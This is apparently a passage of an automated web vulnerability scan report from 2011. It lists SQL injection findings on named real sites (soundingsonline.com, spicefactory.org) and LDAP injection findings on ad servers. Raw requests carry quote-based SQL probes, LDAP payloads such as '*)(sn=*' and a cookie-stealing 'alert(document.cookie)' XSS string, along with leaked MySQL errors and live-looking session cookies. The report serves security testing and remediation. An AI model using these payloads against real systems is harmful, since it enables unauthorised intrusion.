1.113. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues/index.php?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /news/mishaps-a-rescues/index.php?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.114. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/sailing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /news/sailing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.115. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/todays-top-stories?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/todays-top-stories?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.116. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /resources?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.117. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /site-map?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /site-map?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.118. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.119. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/preview-current-issue

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/preview-current-issue?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /subscription-services/preview-current-issue?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.120. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/subscription-services/subscribe-to-e-newsletter

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /subscription-services/subscribe-to-e-newsletter?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /subscription-services/subscribe-to-e-newsletter?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.121. http://www.spicefactory.org/parsley [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.spicefactory.org
Path:	/parsley

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:15:50 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6866

script: <BR>
number of MySQL function calls: 3<BR>
SQL statement: INSERT INTO accesslog (project,page,access,address,referer,user_agent,bot) VALUES ('parsley','project_info',NOW(),'173.193.214.243','h
...[SNIP]...
<BR>
MySQL error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',0)' at line 1<BR>
...[SNIP]...

Request 2

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:16:22 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta content="Spicefactory offers open source software for bu
...[SNIP]...

1.122. http://www.spicefactory.org/parsley [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.spicefactory.org
Path:	/parsley

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:15:49 GMT
Server: Apache/1.3.41 manitu (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j PHP/5.2.17 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.29
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 6831

script: <BR>
number of MySQL function calls: 3<BR>
SQL statement: INSERT INTO accesslog (project,page,access,address,referer,user_agent,bot) VALUES ('parsley','project_info',NOW(),'173.193.214.243',''
...[SNIP]...
<BR>
MySQL error message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'',0)' at line 1<BR>
...[SNIP]...

Request 2

GET /parsley HTTP/1.1
Host: www.spicefactory.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

2. LDAP injection previous next
There are 2 instances of this issue:

http://a.tribalfusion.com/j.ad [size parameter]
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt [NSC_betivggmf-opef cookie]

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

2.1. http://a.tribalfusion.com/j.ad [size parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The size parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the size parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=*)(sn=*&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response 1

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=arn7TwNZaiMt6memCmGwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bWalbfCPvRr5pHFJ2IiiqvUj8gL5UKMojsRtkyGv3iLgZdLhJWNtFwIaQqSDUhJXcolRQQftgBRpZbqFL3j1LmZaRLgOPqeE7bMdTEIGxtZdfM5WI7wWtsmYZaJOJkAibgqRMFJEdwIqaWU9WeZd8ntA03ww6cnyXOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNZb3ZbqSUdhKTLyZaa4ZcFGHeZbVThMfN8pnAYOeBZbsKVSfraRuvG30PErMalZa5; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 377

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/aomM7iT6np2s31XrFLTPip4P3aQAJE4WMo1t3LpdEw56nW5cjaTVrbWGMfPP3uWWvSTFf12UAuWaMnWTnbSTYFSGQZaRretPtYiVsjT2FunntqrYqqM2WvZdQGfZd4AnZbpWisVWY6Yrr81bbh1EEsPbJstK9OLi/http://www.creditfairy.org"><img src="http://cdn5.tribalfusion.com/media/1990056.gif" border=0 height=60 width=468 ><\/a><\/center>');

Request 2

